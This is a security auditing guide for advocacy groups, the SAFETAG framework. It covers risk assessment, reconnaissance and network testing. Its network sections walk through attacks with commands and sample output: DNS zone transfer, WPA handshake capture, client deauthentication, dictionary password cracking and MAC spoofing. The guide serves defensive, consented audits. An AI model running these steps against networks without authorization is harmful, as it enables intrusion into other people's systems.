Table of Contents
SAFETAG Logo

A Security Auditing Framework and Evaluation Template for Advocacy Groups

Guide

License

SAFETAG resources are available under a Creative Commons Attribution-ShareAlike 3.0 Unported (CC BY-SA 3.0) License

The audit framework and checklist may be used and shared for educational, non-commercial, not-for-profit purposes, with attribution to Internews. Users are free to modify and distribute content under conditions listed in the license.

The audit framework and checklist is intended as reference and the authors take no responsibility for the safety and security of persons using them in a personal or professional capacity.

Attribution for content from other Licenses

Usage of "SAFETAG"

SAFETAG is itself a framework and template for organizational audits. As such, audits performed which use or adapt SAFETAG materials may be referred to as "adapting the SAFETAG methodology" or "based on the SAFETAG framework", and similar phrasings, but may NOT be called "SAFETAG audits".

This is not intended to imply that an audit using any or all of the SAFETAG materials need to refer to SAFETAG at all.

This usage policy does not affect the distribution of SAFETAG materials, covered in the license statement above.

Introduction

The Security Auditing Framework and Evaluation Template for Advocacy Groups (SAFETAG) is a professional audit framework that adapts traditional penetration testing and risk assessment methodologies to be relevant to small, non-profit, human rights organizations based or operating in the developing world.

SAFETAG is based upon a set of principles, activities, and best practices to allow digital security auditors to best support at-risk organizations by working with them to identify the risks they face, the next steps they need to take to address them, and guidance on how to seek out support in the future.

SAFETAG audits are targeted at serving small scale civil society organizations or independent media houses who have strong digital security concerns but do not have the funds to afford a traditional digital security audit. The traditional security-audit framework is based upon the assumption that an organization has the time, money, and capacity to aim for as close to perfect security as possible. Low-income at-risk groups have none of these luxuries. These audits are both far too expensive, and produce output that is too complex for these organizations to act upon.

SAFETAG uses a customized combination of selected assessment activities derived from standards in the security auditing world and best-practices for working with small scale at-risk organizations to provide organization driven risk assessment and mitigation consultation. SAFETAG auditors lead an organizational risk modeling process that helps staff and leadership take an institutional lens on their digital security problems, conduct a targeted digital security audit to expose vulnerabilities that impact the vital processes and assets identified, and provide post-audit reporting and follow up that helps the organization and staff identify the training and technical support that they need to address needs identified in the audit, and in the future.

[email protected] | https://safetag.org

The SAFETAG Audit Framework Core

The SAFETAG audit consists of multiple information gathering and confirmations steps as well as research and capacity-building exercises with staff organized in a collection of objectives, each of which supports the core goals of SAFETAG, creating a risk assessment while also building the capacity of the organization.

These objectives provide collections of approaches and activities to gather and verify information in both technical and interactive/social methods, assess and build capacity, and targeted exercises with walk-through instructions for many of these.

These are not meant to be a "checklist" or even a prescribed set of actions -- indeed, experienced auditors will deviate strongly from many of the specific activities. These provide a focused "minimal set" of activities only.

Indeed, many objectives and their specific exercises overlap or can be done together -- on-site interviews with staff can coincide with assessing their devices and keeping one's eyes open for physical security issues. The data assessment exercises may provide enough information that other staff engagements are unnecessary.

The Life Cycle of an Audit

SAFETAG Activities
SAFETAG Activities

The audit process in very cyclical. Newly identified threats, vulnerabilities, capabilities, and barriers impact activities that have and have yet to be run. At the same time the auditor, through conversations, training, and group activities is actively building the organization's agency and addressing time-sensitive or critical threats that are possible within the time frame. This iterative process eventually leads to a point where the auditor is confident they have identified the critical and low hanging fruit, and is confident the organization is capable of moving forward with their recommendations.

Each objective requires a certain base of information, and outputs more information into this cyclical process. Each objective has a "map" of the data flow that it and its specific activities provide based on this map:

SAFETAG Data Flow
SAFETAG Data Flow

While more completely defined below in the Risk Assessment and Agency Building sections, a brief overview of the data flow components:

To make SAFETAG approachable, a core evaluation template which links together a series of specific objectives, each with a variety of linked activities, that contribute towards the goals and their required information needs is represented here. Experienced Auditors will likely come up with their own approaches, and the SAFETAG project welcomes such contributions.

Risk Assessment & Analysis

Functionally, SAFETAG is a digital risk assessment framework. Risk assessment a systematic approach to identifying and assessing risks associated with hazards and human activities. SAFETAG focuses this approach on digital security risks. A SAFETAG audit will work to collect the following types of information in order to assess the risks an organization faces.

Risk is the current assessment of the possibility of harmful events occurring. Risk is assessed by comparing the threats an actor faces with their vulnerabilities, and their capacity to respond to or mitigate emergent threats.

The SAFETAG evaluation revolves around collecting enough information to identify and assess the various risks and an organization and its related actors face so that they can take action strategically.

The Risk Equation
The Risk Equation

Program Analysis

Program analysis identifies the priority objectives of the organization and determine its capacities. This process exposes the activities, actors, and capacities of an organization.

Activities

Definition: The practices and interactions that the organization carries out in order to accomplish their goals.

Example: This includes any activity that the organization carries out to accomplish its goals and those that allow the organization to function (publishing, payment, fund-raising, outreach, interviewing.)

Actors

Definition: The staff, volunteers, partners, beneficiaries, donors, and adversaries associated with the organization.

Example: The core organizational staff, the volunteers, maintenance, cleaning, security, or other non-critical staff, the partner organizations, the individuals and groups that the organization provides services to, groups of unorganized individuals who are opposed to organizational aims, governmental and non-governmental high-power agents and organizations that are opposed to the organizations aims.

Vulnerability analysis

Understand the organisation’s exposure to threats, points of weakness and the ways in which the organisation may be affected.

Vulnerability

Definition: A attribute or feature that makes an entity, asset, system, or network susceptible to a given threat.

Example: This can include poorly built or unmaintained hardware, software, or offices as well as missing, ignored, or poor policies or practices around security.

Threat Analysis

Threat analysis is the process of identifying possible attackers and gathering background information about the capability of those attackers to threaten the organization. The basis of this information is a potential threats history of carrying out specific threats, their capability to carry out those threats currently, and proof that the threat has intent to leverage resources against the target.

Threat

Definition: A threat is a possible attack or occurrence that has the potential to harm life, information, operations, the environment, and/or property.

Example: Threats can range from fire, or flood, to targeted malware, physical harassment, or phishing attacks.

Threat History

Definition: What types of threats has the attacker used historically. And, what types of actors have been targeted by those threats.

Example:

Threat Capability

Definition: The means that the attacker has to carry out threats against the organization.

Example: This includes, but is not limited to technical skill, financial support, number of staff hours, and legal power.

Threat Intent

Definition: The level of desire for the attacker to carry out threats against the organization.

Example: Intent can be goals or outcomes that the adversary seeks; consequences the adversary seeks to avoid; and how strongly the adversary seeks to achieve those outcomes and/or avoid those consequences.

Agency Building

SAFETAG differs from many risk assessment tools because it aims to build the host's and staff's capacity so that they are able to address the risks that the auditor has identified. SAFETAG is designed to provide in-audit activities and training that increase an organizations agency to seek out and address security challenges within their organization. To do this an auditor must collect information that allows them to identify organizational areas of strength and weakness (expertise, finance, willingness to learn, staff time, etc.)

A common refrain, among auditors, software developers and other specialists in this sector, is that digital security is not about technology; it is about people. This is undeniably true, and even the previous SAFETAG modules — despite their more direct fixation on technology — acknowledge this insight by emphasizing the educational and a persuasive roles played by your findings report.

Capacity

Definition: The combination of strengths, attributes and resources available within the organization that can be used to reduce the impact or likelihood of threats.

Example: This includes, but is not limited to technical skill, financial support, staff and management time, relationships, and legal power.

Barriers

Definition: The combination of weaknesses, assumptions, regulations, social or cultural practices, and obligations that get in the way of an organization implementing an effective digital security practice.

Example: Examples can include a lack of funding, lack of authority within an organization to mandate practices to their staff, resistance to change, high staff turnover, or digital illiteracy.

Operational Security

"Also be aware that local groups may not be able to accurately gauge the safety of their communications with you. Sometimes they underestimate the likelihood of risk - at other times, they can wildly overestimate the risk. Either way, trainers need to navigate this issues carefully and respectfully with a "do no harm" approach that respects the reported needs, context, and experiences of your local contact and potential trainees." - Needs Assessment: Level-Up 1

Summary

Below are the baseline operational security guidelines for a SAFETAG audit. Activity specific operational security guidelines are contained within each activity.

Purpose

An audit uncovers an array of sensitive information about an organization. For some at-risk populations the mere act of getting a digital security audit can increase their likelihood of being actively attacked by an adversary. The foundation of the SAFETAG process is the goal of increasing the safety of the host organization, its staff, and the auditor. It is vital that an auditor weigh the possible risk and audit may incur on the organization or the auditor against the possible outcomes of an audit.

Objectives

SAFETAG Methods

Preparation

Summary

This component consists of trip preparation activities that are needed to ensure the technical and facilitated components of the audit are able to be conducted effectively and within the on-site time-frame and in coordination with the organization.

Purpose

A SAFETAG audit has a short time frame. Preparation is vital to ensure that time on the ground is not spent negotiating over the audit scope, updating the auditors systems, searching for missing hardware, or refreshing oneself with the SAFETAG framework. To that end negotiations with the host organization help reveal if the organization has the capacity to undertake the audit and respond to its findings.

Guiding Questions

The Flow of Information

Preparation Information Flow
Preparation Information Flow

Approaches

Outputs

Operational Security

Resources

Facilitation Preparation

Password Dictionary Creation

Other Pre-Engagement Resources

Incident Handling Resources

Data Security Standards

Activities

Assessment Plan

Summary

This component allows an auditor and host to come to an understanding of the level of access that an auditor will have, what is off limits, and the process for modifying the scope of the audit when new information arises. 13,14 This component consists of a process where the auditor collaboratively creates an assessment plan with key members of the organization.

A core tenet of SAFETAG is building agency in organizations to improve their digital security. To that end, collaboratively creating an assessment plan with the organization helps to clarify not only the audit scope - from discussing what sensitive data may be exposed to what systems may be disrupted in the process of the audit - but it also helps reveal the ability of the organization to support and respond to the audit findings.

Overview
Materials Needed
Considerations
Walkthrough

See the Appendix for a DRAFT combined engagement and confidentiality agreement.

Recommendation

Confidentiality Agreement

Summary

Negotiate an agreement with the organization that outlines how an auditor will protect the privacy of the organization and the outcomes of the audit.

Overview
Materials Needed
Considerations
Walkthrough

See the Appendix for a DRAFT Engagement and Confidentiality Agreement.

Recommendation

Incident Response and Emergency Contact

Summary

Establish a procedure for incident handling and an emergency contact in the event that auditor cause or uncover an incident during the course of the assessment. 29,30

Overview
Materials Needed
Considerations
Walkthrough

Travel Checklist

See the Appendix for a sample travel kit / checklist

Password Dictionary Creation

See the Appendix for creating a password dictionary.

Audit Timeline and Planning

Review these notes in preparation for the audit as you begin to map out your schedule. This provides a rough, suggested outline of how to schedule your time on site for a SAFETAG audit, and some reminders of the work you need to have completed before arriving in country.

Prepare for Uncertainty

The SAFETAG roadmap is a crisp, clear data flow of inputs to outputs. Reality, generally speaking, is less direct. There are a few core parts of the audit process that force action, but others are more flexible. Outcomes of your discussion and exploration of the network will also de-rail the process in impossible-to-predict ways. The pre-audit interviews and your own contexts research, research on the organization, and preparation are meant to give you the best possible idea of what situation you'll walk in to, but even with all of that, frankly, shit happens.

Before Travel

First Day

Priorities for the first day include meeting staff (even, possibly especially, for the more technical auditor). There is a strong temptation to dive in and get started, but establishing connections with the staff - especially those you haven't met through interviews - is key. You may discover hidden sources of talent or resistance, historical information, and new parts of the infrastructure or practices and policies that you may not have yet found.

Early steps

From a data-gathering point of view, the first steps are to try and access the wireless network by password guessing, but also to connect to the network and capture traffic for analysis overnight. This provides other views on the actual technology and services used on the network, different both from the management and IT view as well as other tools discussed by staff.

First or Second day

Further Days (on Location) The next day you’re on location, you have hopefully looked through the research data you gathered, and have some specific follow-up things to investigate. It’s also now time to start going through the audit tasks.

Final Day (on Location)

Exploration and check-ins

Throughout the entire audit, aggressively make time to engage with staff - stop for coffee, eat lunch with them, have conversations. This can be integrated in to other parts of the process, such as the user device assessments, as well as being completely independent and natural. Having better connections with staff will make the group exercises, especially the risk assessment work, flow much better.

Whenever you set off a scan (airodumping, nmap, openvas...) are good times to stand up and walk around.

Debrief and Setting Expectations

Largely covered in the [debrief section], making time at the end of the (often hectic) audit week is very important to making sure the next few steps are absolutely clear in terms of timelines and communication protocols.

Clean up

If you have been using paper or post-it notes during the audit, be sure you securely destroy them (by shredding, burning, or tearing into small pieces) before you leave the site on the last day. By the same token, any digital reports should be stored on secure media and securely deleted from all other locations. See the operational security section and per-item notes for further details. Clean off any whiteboards used, and check any camera used to remove sensitive photos.

Follow up care and Reporting

See the reporting sections for specific details here, but a series of check-ins with the organization to support their ability to respond to any incidents, understand further topics from the debrief, and to help provide them a timeline to expect the final report is valuable in maintaining their engagement post-audit to support the needed changes.

Context Research

Summary

This component allows the auditor to identify the relevant regional and technological context needed to provide a safe and informed SAFETAG audit. This component consists of desk research that is collected and analyzed by the auditor, as well as inputs from the Interview component.

Purpose

Analysis of context is the foundation of effective risk management. Both at-risk organizations and auditors will develop assumptions based upon their experience. It is important that an audit is based on information that is current and accurate.

Checking the assumptions both of the organization and of the auditor by researching the current regional and technological context will ensure that an auditor is basing their work on accurate assessments of the conditions the organization faces and that they are making informed operational security considerations.

The Flow of Information

Information Flow
Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Resources

Other Context Analysis Methodologies

Threats to the Auditor

Have aid workers faced retribution for their work in the region?

Is it safe to do digital security work in the region?

Is the area safe to travel to?

Targeted Threats for the organization

Is the group facing any legal threats because of its work?

Does the organization face any targeted threats because of their work?

General Threats for the organization

What general non-governmental threats does the organization face?

What cyber-security practices is the government using?

What general cyber-security threats is the organization facing?

What level of technology is available in the region?

Activities

Conduct Interviews

NOTE: Covered in full under Capacity Assessment

Regional Context Research

Summary

This exercise focuses on research and re-confirmation of regional issues from general trends to specific legal restrictions and safety concerns, as well as current news and persistent challenges.

Overview
Materials Needed
Considerations
Walkthrough

Cross-check reports on regional threats facing organizations with their focus area.

Identify any legal risks associated with conducting the audit. Secure communications and storage, network forensics, device exploitation, digital security training.

Identify any infrastructural barriers to adopting digital security practices.

Explore the security landscape of hardware and software identified in interviews by conducting a basic vulnerability analysis.

Technical Context Research

Summary
Overview
Materials Needed
Considerations
Walkthrough

Capacity Assessment

Summary

In this component the auditor engages with staff through interviews and conversations to identify the organization's strengths and weakness (expertise, finance, willingness to learn, staff time, etc.) to adopting new digital and physical security practices. The auditor uses this information to modify the audit scope and recommendations accordingly.

Purpose

Knowing an organization's strengths and weaknesses allows the auditor to provide more tailored recommendations that an organization will be more likely to attempt and achieve. The auditor will use this assessment in preparing for the audit itself as well as when evaluating the difficulty of a recommendation. This information also provides a starting place for understanding the organization's current use and understanding of technology, digital security, and current threat landscape, as well as revealing elements of an organization's workflow, infrastructure and even vulnerabilities that you might otherwise have overlooked.

The Flow Of Information

Audit Preparation Information Flow
Audit Preparation Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Resources

Background Interview Approaches

Activities

Interviews

Summary

The auditor conducts interviews with various staff members to gather information on the organizations risks and capacity.

Q&A sessions are unabashedly white box aspects of a security assessment, and you will occasionally hear push-back along the lines of, "You wouldn't have found that thing if we hadn't told you about this other thing." Compelling black box findings certainly do have an advantage when it comes to persuasiveness, but obtaining them can be quite time-consuming, so relying exclusively on vulnerabilities that you can identify without "help" is generally a mistake in this resource-constrained sector.

Overview
Materials Needed
Considerations
Walkthrough

See the Appendix for a sample set of interview questions

Capacity Assessment Checklist

Summary

A monolithic, one-time interview with key staff is not always possible or advisable, but interacting with a variety of staff exposes valuable information about every aspect of the audit, from vulnerabilities to capacity to hidden barriers. This serves as a "cheat sheet" of some topics to explore both during the planning and preparation phase and throughout the audit process.

Walkthrough

"Homework"

Organizational

Contextual / Background / Threat information

Technical:

Preparation Support

Reconnaissance

Summary

The remote assessment methodology focuses on direct observation of an organization and their infrastructure, consisting of passive reconnaissance of publicly available data sources ("Open Source Intelligence") This allows the auditor to identify publicly available resources (such as websites, extranets, email servers, but also social media information) connected to the organization and remotely gather information about those resources.

Purpose

While much of SAFETAG focuses on digital security challenges within and around the office, unintended information available from "open sources" can pose real threats and deserve significant attention. This also builds the Auditor's understanding of the organization's digital presence and will guide specific vulnerabilities to investigate once on site.

The Flow Of Information

Reconnaissance Information Flow
Reconnaissance Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Resources

Open Source Intelligence (General)

Organizational Information Gathering

Searching

Pastebin Searching

Recon-ng

Activities

Manual Reconnaissance

Summary

This exercise suggests some targeted online search tools and tricks to gather information leakages from organizations. While many advocacy, activism, and media/journalism focused organizations are very public as part of their operations, the searches suggested here aim to explore data that could be used to better attack or socially engineer an organization.

Overview
Materials Needed
Considerations
Walkthrough

These custom and more manual approaches work excellently in combination with automated tools such as recon-ng or the commercial Maltego. Working with both these tricks and the automated tools, feeding information learned from one back to the other, is a powerful way to unearth large amounts of information about an organization.

Much of the tools and further guidance is well covered in the references for the Reconnaissance method, a small selection of starting points is mapped out below.

Take care, however, to not waste time on this; using image information tools on every photo on an organization's website, or researching every linked social media account may not provide further valuable information - step back and judge the value of digging deeper - are you finding adversaries? Are you finding information that the organization may not want online? Are there other methods which might be more appropriate to apply?

Search Engines

Google dorking tricks:

Social Media / Account Discovery
Additional Tools
Pastebin Searching
Working with Images
Recommendation

Automated Reconnaisance

Summary

This component allows the auditor to quickly identify publicly available resources (such as websites, extranets, email servers, but also social media information) connected to the organization and remotely gather information about those resources.

Overview
Materials Needed
Considerations
Walkthrough

See the Appendix for a full walk-through of using recon-ng

Recommendation
Summary

MX, or Mail Exchange, records are required to be public for any domain you wish to receive email through. These records can still reveal sensitive information about your hosting set-up.

MX Records can reveal vulnerable mail servers or information about other services hosted internally.

Overview
Materials Needed
Considerations
Walkthrough

MX Record research reveals self-hosted email server at SampleOrg’s offices:

mail.sample.org has address 256.0.0.3

Determine the authoritative name server(s) for the organization’s

primary domain:

[email protected]:~# host -t mx sample.org
sample.org mail is handled by 21 mail.sample.org

Determine the IP address of the mail server:

[email protected]:~# host mail.sample.org
mail.sample.org has address 256.0.0.3
Recommendation

No fix needed

Unless other assessments reveals specific vulnerabilities in e-mail services used, there is no action to take. Unless you have sufficient in-house expertise, it is often recommended to not host email servers. While self-hosted email provides more control and potentially security, managing the security of the server is a complex job. Other mail services, such as MailControl or Postini, also can provide some level of protection by being a first-pass check for spam and viruses, and (slightly) reducing the visibility of your organizational mail server.

Anonymous DNS Zone Transfer

Summary

Anonymous individuals online can request the full list of the hostnames on the organizations domain. Responding to zone requests from anyone on the Internet is comparable to providing an inventory of office locations, pending projects and service providers to anyone who asks. As such, it is not inherently dangerous, but it does require that the organization not rely on the assumption that unpublicized URLs are in fact secret.

An overly permissive domain name service (DNS) provider allows an attacker to enumerate online services that the organization might think are “hidden” because they have not been (intentionally) published. A zone transfer returns all of the hostnames at a particular domain, or “zone.” So, a request for sample.org may return www.sample.org, webmail.sample.org and ftp.sample.org, along with other less obviously guessable targets, such as wordpress-testing.sample.org.

While any user should be able to use a name server to look up a hostname and convert it to the corresponding IP address, most well-administered name servers allow full “zone transfer” requests only from a specific list of authorized locations (often themselves subsidiary name servers).

Overview
Materials Needed
Considerations
Walkthrough

Determine the authoritative name server(s) for the organization’s primary domain:

$ host -t ns sample.org
sample.org name server ns1.something.net.
sample.org name server ns2.something.net.

Attempt a zone transfer on that domain, using that name server:

$ host -l sample.org ns1.something.net
Using domain server:
Name: ns1.something.net
Address: 256.0.0.1#53
Aliases:

www.sample.org has address 256.0.0.2
mail.sample.org has address 256.0.0.3
webmail.sample.org has address 256.0.0.4
ftp.sample.org has address 256.0.0.5
foo.sample.org has address 256.0.0.6
bar.sample.org has address 256.0.0.7
Recommendation

Eliminate or limit zone transfer permissions

The DNS provider for sample.org allows anonymous DNS zone transfers, revealing subdomain information

An anonymous zone transfer request revealed the following subdomains:

www.sample.org has address 256.0.0.2
mail.sample.org has address 256.0.0.3
webmail.sample.org has address 256.0.0.4
ftp.sample.org has address 256.0.0.5
foo.sample.org has address 256.0.0.6

In most cases, the DNS Zone Transfer policies will be set by your domain name provider; and most providers automatically limit anonymous zone transfers. If yours does not, you will need to work with their support team to prevent this, or switch to a different DNS provider.

If your organization maintains its own DNS servers, the administrator of those servers should check the zone transfer policies to prevent anonymous transfers.

Network Access

Summary

This component allows the auditor to test the strength of defenses the host has in place to protect their local area network. This component consists of gaining access to the local area network through a wireless access point and unsecured physical channels (such as an ethernet jack).

Purpose

By walking organizations through the vulnerabilities of wireless networks, you have the opportunity to discuss password strength, and the power that having "offline" access to a password means in terms of brute forcing it, as well as the importance of defense in depth even within their trusted work network - reducing the services computers and servers are sharing, setting up local firewalls on computers, and requiring authentication to access files.

Even a few minutes of network "sniffing" by an adversary can enable them to work offline to reveal the network password. Knowing this password would let someone then access the entire internal network, files shared internally, and even change network settings to enable remote access. While in an ideal setup, this would give no further access to sensitive documents, it is not uncommon to find shared file folders, or to gain access to the firewall or network routers (often set to the default password, because they're only accessible from inside the network...).

The Flow of Information

Information Flow
Information Flow

Guiding Questions

Approach

Note: If you didn't manage to break through the password, it's not worth the precious audit time to brute force it - simply ask for the password and move on. If it's a WPA network, you can work on cracking the password after hours, if only to demonstrate the amount of time their current password would "protect" them for against a dedicated attacker.

Outputs

Operational Security

Note: This section is one of the few sections where the SAFETAG audit does go through attack scenarios, from attempting to "break in" to the wireless network to testing exposed ethernet jacks for connectivity.

The reasons for this are threefold. First, access to an organization's internal network tends to reveal sensitive data and "shadow" infrastructures (such as dropbox usage) that lead to many recommendations to improve access control and discussions of the value of defense in depth. Second, the specific act of breaking the wifi password allows for a discussion on password security without attacking any specific user's password. Finally, with wireless networks treated as equivalent to wired networks in many offices, reminding the organization that wireless networks extend beyond the physical walls of the office is useful in discussing password rotation and guest network policies.

Once you have access to the network, you need to first document how you managed that and share it with the hosts. This is a great moment to discuss passwords in many cases.

Preparation

Baseline Skills

Resources

Wireless Access Guides & Resources

Activities

WPA Password Cracking

Summary

The organization’s wireless Local Area Network (WLAN) protects the network and its users with WPA encryption. This is an important security measure, and a WPA-protected wireless network is much safer than an unencrypted “open” network or a WEP-protected network. (WEP is fundamentally flawed, and extremely simple attacks have been widely known for over a decade.) However, the ease with an attacker could guess the WPA key, or “WiFi password,” is a serious issue, particularly considering its importance as an essential perimeter control. An attacker who gains access to the wireless LAN immediately bypasses many protections that network administrators, and other users of the office network, often take for granted. Put another way, anyone able to guess the WPA key is immediately “inside the firewall.”

Using a laptop and a wireless card with a standard, internal antenna (or using a customized smartphone or other small device), an attacker could easily position themselves close enough to the office to carry out the first phase of this attack, which would only take a few minutes. The second phase, which is supposed to be the difficult part, could take even less time. From the privacy of their own home or office, the attacker could use a minimally customized password dictionary to guess the WPA key .

Overview
Materials Needed
Considerations
Walkthrough

An attacker can crack the office’s WPA key in approximately with a short and minimally customized password dictionary based on open information about the organization and basic word collections.

Step 1: The attacker customizes their WiFi password dictionary, adding phrases related to the subject: organization name, street address, phone number, email domain, wireless network name, etc. Common password fragments are included, as well: qwerty, 12345, asdf and all four-digit dates back to the year 2001, for example, among others. He may then add hundreds or thousands of words (in English and/or other relevant languages).

See the Dictionary Creation example under Preparation for details on password dictionary buidling.

Step 2: The attacker would then begin recording all (encrypted) wireless traffic associated with the organization’s access point:

$ sudo airodump-ng -c 1 --bssid 1A:2B:3C:4D:5E:6F -w sampleorg_airodump mon0

 CH  1 ][ Elapsed: 12 mins ][ 2012-01-23 12:34 ][ fixed channel mon0: -1
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 1A:2B:3C:4D:5E:6F  -70 100    12345    43210    6   1  12e. WPA2 CCMP   PSK sampleorg
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
 1A:2B:3C:4D:5E:6F  01:23:45:67:89:01    0    0e- 0e   186    12345
 1A:2B:3C:4D:5E:6F  AB:CD:EF:AB:CD:EF    0    1e- 1      0     1234
 1A:2B:3C:4D:5E:6F  AA:BB:CC:DD:EE:FF  -76    0e- 1      0     1122
 1A:2B:3C:4D:5E:6F  A1:B2:C3:D4:E5:F6  -80    0e- 1      0     4321

wifite is also useful for this step, and claims to automatically de-auth (step 3).

Step 3: Next, the auditor forces a wireless client, possibly chosen at random, to disconnect and reconnect (an operation that is nearly always invisible to the user).

In the example below, AB:CD:EF:AB:CD:EF is the MAC address of a laptop that was briefly disconnected in this way.

$ aireplay-ng -0 1 -a 1A:2B:3C:4D:5E:6F -c AB:CD:EF:AB:CD:EF mon0

 15:54:48  Waiting for beacon frame (BSSID: 1A:2B:3C:4D:5E:6F) on channel -1
 15:54:49  Sending 64 directed DeAuth. STMAC: [AB:CD:EF:AB:CD:EF] [ 5| 3 ACKs]

The goal of this step is to capture the cryptographic handshake that occurs when the targeted client reconnects. Try using different clients if the first one doesn't work, or try (physically) moving around.

This handshake does not contain the WPA key itself, but once the the complete handshake process has been seen, the auditor (or a potential attacker) can leave the vicinity and run various password cracking tools to try and discover the password. While a complete password cracking tutorial is out of scope for SAFETAG documentation, below are three strategies:

Step 4: The auditor attempts to discover the WPA password.

A good wordlist with a few tweaks tends to break an unforunate number of passwords. Using a collection of all english words, all words from the language of the organization being audited, plus a combination of all these words, plus relevant keywords, addresses, and years tends to crack most wifi passwords.

    $ aircrack-ng -w pwdpairs.txt -b 1A:2B:3C:4D:5E:6F sampleorg_airodump*.cap

For WPA captures, John can either feed in to an aircrack process or attack a capture directly. For captures, you first have to convert the .cap file (from wireshark, wifite, airodump, etc.) to a format that John likes. The Jumbo version we use has conversion tools for this available:

  $wpapcap2john wpa.cap > crackme
  $./john -w:password.lst -fo=wpapsk-cuda crackme 
Results

Successful password cracking via piping these into aircrack-ng:

 Opening sampleorg_airodump-01.cap
 Reading packets, please wait...
                                 Aircrack-ng 1.1
                    [00:00:05] 9123 keys tested (1876.54 k/s)
                           KEY FOUND! [ sample2012 ]

      Master Key     : 2A 7C B1 92 C4 61 A9 F6 7F 98 6B C1 AB 53 7A 0F
                       3C AF D7 9A 0C BD F0 4B A2 44 EE 5B 13 94 12 12

      Transient Key  : A9 C8 AD 47 F9 71 2A C6 55 F8 F0 73 FB 9A E6 1D
                       23 D9 31 25 5D B1 CF EA 99 2C B3 D7 E5 7F 91 2D
                       56 25 D5 9A 1F AD C5 02 E3 2C C9 ED 74 55 BA 94
                       D6 F5 0A D1 3B FB 39 40 19 C9 BA 65 2E 49 3D 14

      EAPOL HMAC     : F1 DF 09 C4 5A 96 0B AD 83 DD F9 07 4E FA 19 74 

The fourth line of the above output provides some useful information about the effectiveness of a strong WPA key. That rate of approximately 2000 keys per second means that a full-on, brute-force attack against a similar-length key that was truly random (and therefore immune to dictionary-based attacks) would take about 70^9 or 20 trillion seconds, which is well over 600,000 years. Or, for those who favor length and simplicity over brevity and complexity, a key containing four words chosen from among the 10,000 most common English dictionary words would still take approximately 150,000 years to crack (using this method on an average laptop).

It is worth noting that an attacker with the resources and the expertise could increase this rate by a factor of a hundred. Using a computer with powerful graphical processing units (GPUs) or a cloud computing service like Amazon’s EC2, it is possible to test 250,000 or more keys per second. A setup like this would still take several lifetimes to guess a strong password, however.

Regardless, the success of this attack against a wireless network would allow an attacker to bypass all perimeter controls, including the network firewall. Without access to the office LAN, a non-ISP, non-government attacker would have to position himself on the same network as an external staff member in order to exploit any flaws in the organization’s email or file-sharing services. With access to the local network, however, that attacker could begin carrying out Local attacks quite quickly, and from a distance.

With regard to the distance from which an attacker could maintain such access, the office WiFi network appears to have a relatively strong signal, which extends to the street out front:

{photograph of location}

Figure 1: WiFi signal strength from a nearby location

{screenshot of WiFi strength}

Material that may be Useful:
Recommendation

WPS PIN Cracking

Summary

WPS was built as an addition to WPA to make it easier to add devices without typing in secure passwords, but this ease of use means that a malicious actor can pose as a device and effectively reduce the potentially very difficult passwords WPA allows down to a simple numeric-only 8 character PIN. Further, the WPS system allows an attacker to work on this PIN in two parallel chunks, further reducing its security. This, like WEP, is a "live" attack - you have to stay connected to the network - but also like WEP, it is a guaranteed attack; your brute forcing of the WPS system will eventually (2-10 hours) allow you network access.

Walkthrough
Material that may be Useful:
Recommendation
WPS Pin entry should be disabled on the wireless router, or only enabled temporarily to add new devices to the network.

WEP Password Cracking

Summary

WEP provides no effective protection for a wifi network. Most wifi routers offer WPA encryption as an option, and if this is available it should be immediately implemented. Some older routers (and wifi devices) do not support WPA. It is highly recommended to upgrade immediately to hardware that supports WPA and to eliminate all WEP network access.

Walkthrough

The auditor can be guaranteed to access a WEP network with sufficient time by cracking the WEP key.

Material that may be Useful:

For educational purposes, if no WEP network is available, you can use this pre-built airodump-ng capture file and skip the airodump-ng and aireplay-ng packet injection steps.

Recommendation

Accessing a MAC-filtered Network

Summary

Open and MAC-address-filtered wireless access points are not only open to anyone within range to join and listen in to, but also do not provide protection to those on the network itself, even if they do not "broadcast" their name. These may seem like great ways to prevent unauthorized users from accessing your network without resorting to passwords, but they are trivial to overcome.

Overview
Materials Needed
Considerations
Walkthrough

The auditor can easily gain access to an open or MAC address filtered access point.

airodump-ng
* Change our MAC address to one that’s on the whitelist
ifconfig mon0 down
macchanger -m [MAC ADDRESS IDENTIFIED] mon0
ifconfig mon0 up
Material that may be Useful:
Recommendation
Transitioning to WPA networks with strong passwords, even for guest networks, is recommended.

Network Mapping

Summary

This component allows the auditor to identify the devices on a host's network, the services that are being used by those devices, and any protections in place.

Purpose

Mapping an organization's network exposes the multitude of devices connected to it -- including mostly forgotten servers -- and provides the baseline for later work on device assessment and vulnerability research.

This process also reveals outside service usage (such as google services, dropbox, or others) which serve -- intentionally or not -- as shadow infrastructure for the organization. In combination with beacon research from the network discovery process, many devices can be associated with users.

The Flow Of Information

Network Mapping Information Flow
Network Mapping Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Baseline Skills

Resources

Network Mapping Methods

Nmap Scanning

Activities

Network Scanning

Summary

Local networks often have a variety of devices connected to them - servers, user devices, staff cellphones, and more. Scanning the connected devices can reveal potential areas for further research (odd ports being open, out of date devices/services, forgotten servers/services...).

Selected scanning of external network devices (websites, webmail, extranet services) may also reveal vulnerabilities or other areas of concern.

Overview
Materials Needed
Considerations
Walkthrough

Using a network scanning tool (nmap/zenmap work well), discover the devices connected to the organization's network, and explore further information such as services, service banners, and operating systems. More intense scans can be too time-consuming to run across the entire network, so target those to higher value systems. As always, be aware of the scans and additional scripts you choose, and focus your exploration (in nmap) on scripts categorized as "safe".

Service research

SMB Network tools

Shared Folders Enumeration

Unsigned NTLM authentication messages vulnerable to Man-in-the-Middle attack on SMB file servers

Unsigned NTLM authentication messages allow an attacker on the LAN to add, remove or copy files to and from the organization’s file servers (and workstations with filesharing enabled).

Recommendation

While office networks are often treated as "trusted" spaces, measures should be in place to reduce the potential harm of an attacker who gains access. In addition, devices that "travel" -- such as laptops and mobile phones -- should have adequate security settings (generally, firewalls) to protect them on other networks.

A policy should be in place for connecting personal devices to work networks, as well as work devices to non-work networks.

Network Traffic Analysis

Summary

Any content that is sent out over the network without encryption is easy to intercept; this includes email, web passwords, and chat messages.

